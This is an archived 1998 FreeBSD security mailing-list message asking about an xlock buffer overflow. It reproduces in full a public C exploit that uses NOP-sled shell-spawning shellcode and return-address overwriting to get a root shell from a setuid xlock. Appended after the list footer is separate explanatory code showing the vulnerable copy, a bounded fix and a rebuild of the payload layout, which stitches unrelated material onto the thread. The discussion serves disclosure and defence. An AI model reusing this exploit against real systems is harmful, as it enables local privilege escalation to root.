Date: Mon, 29 Jun 1998 10:17:18 +0200
From: Christoph Kukulies <kuku@gilberto.physik.RWTH-Aachen.DE>
To: Thomas Gellekum <tg@ihf.rwth-aachen.de>
Cc: Christoph Kukulies <kuku@gilberto.physik.RWTH-Aachen.DE>, freebsd-security@FreeBSD.ORG
Subject: Re: xlock
Message-ID: <19980629101718.52752@gil.physik.rwth-aachen.de>
In-Reply-To: <8790mgy8b8.fsf@ghpc6.ihf.rwth-aachen.de>; from Thomas Gellekum on Mon, Jun 29, 1998 at 09:29:47AM +0200
References: <199806290632.IAA00836@gilberto.physik.RWTH-Aachen.DE> <87btrcy9s5.fsf@ghpc6.ihf.rwth-aachen.de> <19980629092005.33214@gil.physik.rwth-aachen.de> <8790mgy8b8.fsf@ghpc6.ihf.rwth-aachen.de>
On Mon, Jun 29, 1998 at 09:29:47AM +0200, Thomas Gellekum wrote:
> Christoph Kukulies <kuku@gilberto.physik.RWTH-Aachen.DE> writes:
> 
> > On Mon, Jun 29, 1998 at 08:58:02AM +0200, Thomas Gellekum wrote:
> > > Christoph Kukulies <kuku@gilberto.physik.RWTH-Aachen.DE> writes:
> > > 
> > > > Alarmed by recent buffer overflow attacks on Linux machines in
> > > > my vicinity (an exploit for this is available) I thought about
> > > > xlock under FreeBSD and would like to know whether the
> > > > security hole has been sorted out under FreeBSD 2.2.x or what
> > > > measures are advised to prevent it.
> > > 
> > > Could you tell more about this?
> > 
> > /* x86 XLOCK overflow exploit
> >    by cesaro@0wned.org 4/17/97
> > 
> >    Original exploit framework - lpr exploit
> > 
> >    Usage: make xlock-exploit
> >           xlock-exploit <optional_offset>
> > 
> >    Assumptions: xlock is suid root, and installed in /usr/X11/bin
> > */
> > 
> > [complete xploit can be sent on demand]

OK, here goes: (This is for Linux 2.x, xlock path and code on stack may
vary for FreeBSD if applicable).
--8<----------------------------------------------------------------------
/* x86 XLOCK overflow exploit
   by cesaro@0wned.org 4/17/97

   Original exploit framework - lpr exploit

   Usage: make xlock-exploit
          xlock-exploit <optional_offset>

   Assumptions: xlock is suid root, and installed in /usr/X11/bin
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>     /* memset, strlen */
#include <unistd.h>
#include <sys/types.h>  /* u_char */

#define DEFAULT_OFFSET 50
#define BUFFER_SIZE 996

/* Read the current stack pointer.  The exploit guesses that the
   vulnerable buffer inside xlock sits a small offset above it. */
long get_esp(void)
{
    long esp;
    __asm__("movl %%esp,%0" : "=r"(esp));
    return esp;
}

int main(int argc, char *argv[])
{
    char *buff = NULL;
    unsigned long *addr_ptr = NULL;
    char *ptr = NULL;
    int dfltOFFSET = DEFAULT_OFFSET;
    /* Linux x86 shellcode: execve("/bin/sh") followed by exit() */
    u_char execshell[] =
        "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07"
        "\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"
        "\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8"
        "\xd7\xff\xff\xff/bin/sh";
    int i;

    if (argc > 1)
        dfltOFFSET = atoi(argv[1]);
    else
        printf("You can specify another offset as a parameter if you need...\n");

    buff = malloc(4096);
    if (!buff) {
        printf("can't allocate memory\n");
        exit(0);
    }
    ptr = buff;

    /* NOP sled up to the shellcode, then the shellcode at the end of
       the buffer */
    memset(ptr, 0x90, BUFFER_SIZE - strlen((char *)execshell));
    ptr += BUFFER_SIZE - strlen((char *)execshell);
    for (i = 0; i < strlen((char *)execshell); i++)
        *(ptr++) = execshell[i];

    /* Two copies of the guessed return address (pointing into the
       sled), then a terminating NUL so execl() passes the whole thing */
    addr_ptr = (unsigned long *)ptr;
    for (i = 0; i < 2; i++)
        *(addr_ptr++) = get_esp() + dfltOFFSET;
    ptr = (char *)addr_ptr;
    *ptr = 0;

    /* The oversized buffer goes in as the X resource name */
    execl("/usr/X11/bin/xlock", "xlock", "-nolock", "-name", buff, NULL);
    return 0;
}
--8<----------------------------------------------------------------------

> 
> Please do. Desmond Bagley, the maintainer of xlockmore mentioned a
> security hole in Mesa with suid binaries. I don't know if it's the
> same problem.
> 
> tg

-- 
Chris Christoph P. U. Kukulies kuku@gil.physik.rwth-aachen.de

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe security" in the body of the message
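The following is an added example; it is not part of the mailing-list thread and is not xlock's own code. It shows the shape of the bug the exploit above targets (an attacker-controlled string copied into a fixed-size stack buffer with no length check), the bounded replacement that a fix would use, and a reconstruction of the exploit's payload layout so its numbers (a 996-byte buffer, a sled, two return-address slots) can be checked without running anything setuid. The 996-byte buffer, the function names and the 4-byte pointer size of the 32-bit target are assumptions for illustration; the "shellcode" bytes are a constructed placeholder, not the exploit's code.

```c
/* Added example, not from the thread or from xlock.  NAME_BUF, TARGET_PTR
 * and all function names are assumptions for illustration. */
#include <stdio.h>
#include <string.h>

#define NAME_BUF   996   /* assumed fixed buffer size; matches the exploit's BUFFER_SIZE */
#define TARGET_PTR 4     /* assumed sizeof(long) on the 32-bit x86 target */

/* (1) Vulnerable shape: strcpy() trusts the caller's length.  With a name
 * of NAME_BUF bytes or more it writes past dst into the saved frame
 * pointer and return address, which is exactly what the exploit relies on.
 * It is only ever called here with a short constructed name. */
void set_name_unbounded(char dst[NAME_BUF], const char *src)
{
    strcpy(dst, src);
}

/* (2) Bounded replacement: reject rather than truncate, so an over-long
 * name is reported instead of silently mangled.  Returns 0 on success,
 * -1 if src (with its terminator) would not fit in NAME_BUF bytes. */
int set_name_bounded(char dst[NAME_BUF], const char *src)
{
    size_t n = strlen(src);
    if (n >= NAME_BUF)
        return -1;
    memcpy(dst, src, n + 1);
    return 0;
}

/* (3) Payload layout mirroring the exploit: a NOP sled fills the buffer up
 * to the shellcode, the shellcode sits at the very end of the buffer, and
 * two copies of the guessed return address follow so that whichever slot
 * holds the saved EIP is overwritten.  The address is written byte-wise in
 * little-endian order as the target expects.  Returns the payload length
 * (excluding the terminating NUL), or 0 if the sizes do not work out. */
size_t build_payload(char *out, size_t out_len,
                     size_t shellcode_len, unsigned long ret_addr)
{
    size_t total = NAME_BUF + 2 * TARGET_PTR;
    size_t sled, i, b;

    if (shellcode_len > NAME_BUF || out_len < total + 1)
        return 0;
    sled = NAME_BUF - shellcode_len;

    memset(out, 0x90, sled);                     /* NOP sled */
    memset(out + sled, 0xcc, shellcode_len);     /* placeholder "shellcode" (int3) */
    for (i = 0; i < 2; i++)                      /* two return-address slots */
        for (b = 0; b < TARGET_PTR; b++)
            out[NAME_BUF + i * TARGET_PTR + b] =
                (char)((ret_addr >> (8 * b)) & 0xff);
    out[total] = '\0';                           /* execl() stops copying here */
    return total;
}

int main(void)
{
    char buf[NAME_BUF];
    char big[NAME_BUF + 1];
    char payload[2048];
    size_t n;

    set_name_unbounded(buf, "xlock");            /* safe only because the input is short */
    printf("unbounded copy of a short name: %s\n", buf);

    memset(big, 'A', NAME_BUF);                  /* constructed 996-byte name */
    big[NAME_BUF] = '\0';
    printf("bounded copy of a 996-byte name: %s\n",
           set_name_bounded(buf, big) == 0 ? "accepted" : "rejected");

    n = build_payload(payload, sizeof payload, 50, 0xbffffa10UL);
    printf("payload length for a 50-byte shellcode: %zu bytes\n", n);
    return 0;
}
```

The point of `set_name_bounded` is that it fails closed: a name that does not fit is refused outright, so no partial copy ever reaches the stack frame. `build_payload` reproduces the arithmetic of the exploit above, which is why a 50-byte shellcode yields a 1004-byte argument: 946 sled bytes, 50 shellcode bytes and two 4-byte return addresses.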